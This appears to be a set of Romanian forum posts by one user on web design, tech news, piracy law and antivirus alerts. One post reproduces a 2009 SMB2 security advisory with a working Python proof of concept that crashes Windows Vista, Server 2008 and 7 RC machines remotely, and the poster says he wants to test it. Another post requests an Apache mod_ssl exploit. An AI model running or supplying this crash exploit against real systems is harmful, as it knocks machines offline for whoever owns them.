hirosima

Mosad imi poti da un exemplu? Iti multumesc adi003

Bine v-am gasit din nou. Sunt admin impreuna cu un prieten la un site si nu avem foarte multa experienta in domeniu, asi vrea sa stiu cum ar trebui strucutrat un site ca sa fie simplu, atragator in acelasi timp, sa aibe o culoare adecvata si mai mult decat atat informatie pe care o punem sa fie foarte usor de gasit si accesat de orce incepator in informatica. Asi putea sa las linkul de la siteul actual insa nu vreau sa credeti ca fac publicitate. In site sunt in principal articole si activitati pe care le desfasuram, diferite proiecte in curs si de viitor, deasemenea o galerie de fotografi cu activitatile facute pana acuma. Ar fi si m-ai bine puteti posta si imagini pt design. O sa pun si eu una. Va multumesc

chiar super a iesit, o sa incerc si eu, sunt pasionat de design...

O companie americana de distributie a filmelor artistice ofera un premiu de 1 milion de dolari pentru algoritmul care ajuta la identificarea genului de filme pe care le prefera utilizatorul. Sursa:http://www.stiinta.info/cine-pune-la-punct-un-algoritm-primeste-1-milion-de-dolari/ne

Cu interfata sa usor de utilizat si sumedenia de aplicatii disponibile pentru descarcat, Iphone este unul dintre cele mai atractive telefoane inteligente. Dar contrar cu ce sustine Apple, noua criptare folosita este proasta cand vine vorba de protectia datelor sensibile cum ar fi numarul de card si datele securizate personale Sursa:Stiinta.info : iPhone 3GS nu e asa de sigur precum pare

chiar ce sa intamplat cu siteul?

eu cred daca legea ar intra in vigoare toti romani le-ar sari in cap, sau ar iesi in strada cu proteste... dar acuma pe bune cine nu vrea un joc gratis sau un film cu doar cateva clickuri si putina abdare, poate ca si parlamentari descarca la greu de pe net sau macar copii lor.

cred totusi ca sunt prea multi crackeri care sunt impotriva legi, si chiar daca la suprafata legea ii poate curata pe uni tot va ramane un nucleui care sa degajeze impotrivirea legegi cu severitate.

mie nu mai imi trebuie windows 7... raman tot la vechiul si arhaicul xp.

sunt deacord cu tine..

destul de tarziu mi se pare ca sau gandit la varianta cu 128 bits...

am auzit odata ca microsoft crease un virus si infecta toate pc-urile cu windows si cauta bugurile si le actualiza automat. Cred ca e o mare vrajela. Sper ca cea cu patchul sa fie adevarata..

nu se explica altfel decat un scam page...

============================================= - Release date: September 7th, 2009 - Discovered by: Laurent Gaffié - Severity: High ============================================= I. VULNERABILITY ------------------------- Windows Vista, Server 2008 < R2, 7 RC : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. II. BACKGROUND ------------------------- Windows vista and newer Windows comes with a new SMB version named SMB2. See: http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0 for more details. III. DESCRIPTION ------------------------- [Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS patch, for another SMB2.0 security issue: KB942624 (MS07-063) Installing only this specific update on Vista SP0 create the following issue: SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality. The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used to identify the SMB dialect that will be used for futher communication. IV. PROOF OF CONCEPT ------------------------- Smb-Bsod.py: #!/usr/bin/python #When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error from socket import socket host = "IP_ADDR", 445 buff = ( "\x00\x00\x00\x90" # Begin SMB header: Session message "\xff\x53\x4d\x42" # Server Component: SMB "\x72\x00\x00\x00" # Negociate Protocol "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 "\x00\x26"# Process ID High: --> normal value should be "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00" ) s = socket() s.connect(host) s.send(buff) s.close() V. BUSINESS IMPACT ------------------------- An attacker can remotly crash any Vista/Windows 7 machine with SMB enable. Windows Xp, 2k, are NOT affected as they dont have this driver. VI. SYSTEMS AFFECTED ------------------------- [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 < R2, Windows 7 RC. VII. SOLUTION ------------------------- No patch available for the moment. Close SMB feature and ports, until a patch is provided. Configure your firewall properly You can also follow the MS Workaround: http://www.microsoft.com/technet/security/advisory/975497.mspx VIII. REFERENCES ------------------------- http://www.microsoft.com/technet/security/advisory/975497.mspx http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx IX. CREDITS ------------------------- This vulnerability has been discovered by Laurent Gaffié Laurent.gaffie{remove-this}(at)gmail.com X. REVISION HISTORY ------------------------- September 7th, 2009: Initial release September 11th, 2009: Revision 1.0 release XI. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. XII.Personal Notes ------------------------- Many persons have suggested to update this advisory for RCE and not BSOD: It wont be done, if they find a way to execute code, they will publish them advisory. # milw0rm.com [2009-09-09] vreau sa il probez sa vad daca intradevar merge...

Am si eu nevoie de exploitul: Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability mod_ssl/2.2.11 OpenSSL/09.8e-fips-rhel5 mod_bwlimited/1.4

putem discuta cu administratorul de bugul XSS sa il corecteze...

Ma uitam la niste documentare pe discovery si facea reclama la site-ul SPUNE SI TU, mi sa parut o initiativa interesanta. E posibil sa fie doar niste pareri aruncate in vant, sa fim totusi pozitivi si sa ne scriem parereile...

mie imi place mai mult sa rulez aircrack din shell pe linux...

aceiasi intrebare vreau sa iti adresez.

nu sunt setate heuristic cum zici tu. aseara am intrat fara nici o problema pe yahoo, iar acuma imi apare fereastra de la kaspersky...

in dimineata asta am vrut sa imi verific e-mailul si surpriza, kaspersky imediat mi-a blocat trojanul: The requested URL could not be retrieved While trying to retrieve the URL: Yahoo! Espaa The following error was encountered: The requested object is INFECTED with the following viruses: HEUR:Trojan.Script.Generic yahoo.com la fel: The requested URL could not be retrieved While trying to retrieve the URL: http://es.yahoo.com/?p=us The following error was encountered: The requested object is INFECTED with the following viruses: HEUR:Trojan.Script.Generic Please contact your service provider if you consider it incorrect. Please contact your service provider if you consider it incorrect.

ar fi interesant sa stim, cat timp a muncit acasa pentru a crea codul sursa pentru acel exploit...

in locul tau nu asi comenta, mersi dar nu ma ajuta am nevoie de un program cum am scris in post, care sa imi calculeze aria unor poligoane neregulate...

vreau si eu un program sau o formula matematica care sa imi calculeze airia unui poligon, ma puteti ajuta?

presupun ca trebuie sa fie vulnerabil...